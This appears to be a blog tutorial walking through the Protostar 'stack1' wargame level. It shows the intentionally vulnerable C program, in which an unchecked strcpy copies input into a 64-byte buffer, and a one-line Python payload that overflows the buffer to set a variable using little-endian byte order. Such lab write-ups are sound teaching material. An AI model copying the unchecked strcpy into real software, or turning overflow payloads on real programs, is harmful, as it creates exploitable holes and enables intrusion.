In previous tutorial I completely explained how to exploit protostar stack 0 vulnerable program. In today tutorial we are going ahead and try a next level . In stack 1 level we have to modify a variable to per decided value. This one is so similar to stack zero level . But today you have to learn some new things like little endians notation etc. No buddy it is not something about little Indian people :-) . It's endian.
So let's go. Hear you can see the source code .
#include <stdlib.h>
#include <unistd.h>
#include <stdio.h>
#include <string.h>
int main(int argc, char **argv)
{
volatile int modified;
char buffer[64];
if(argc == 1) {
errx(1, "please specify an argument\n");
}
modified = 0;
strcpy(buffer, argv[1]);
if(modified == 0x61626364) {
printf("you have correctly got the variable to the right value\n");
} else {
printf("Try again, you got 0x%08x\n", modified);
}
}
I'm not going to explain this code in deeply, because I cleared all things in previous tutorial.
Now give your focus to following lines of code.
if(modified == 0x61626364){
printf("you have correctly got the variable to the right value\n");
}
It checks if variable is equal to 0x61626364 or not. What's 0x61626364? It is in the form of hex. If we get ASCII values, that will be abcd. So what we want to do is put abcd in to that variable. Yes we can use buffer overflow technique to do this task. In previous stack0 example we overwrote variable with a character A.


$(python -c "print '\x41' * 64 + '\x64\x63\x62\x61'")


Also read
In C there are number of ways to getting output to the screen.You can use them according to your....
Today I bought you another tutorial on Linux. Hear we are going to discus about basic user....
SQL injection, The classical example of web application vulnerabilities. Actually the term SQL....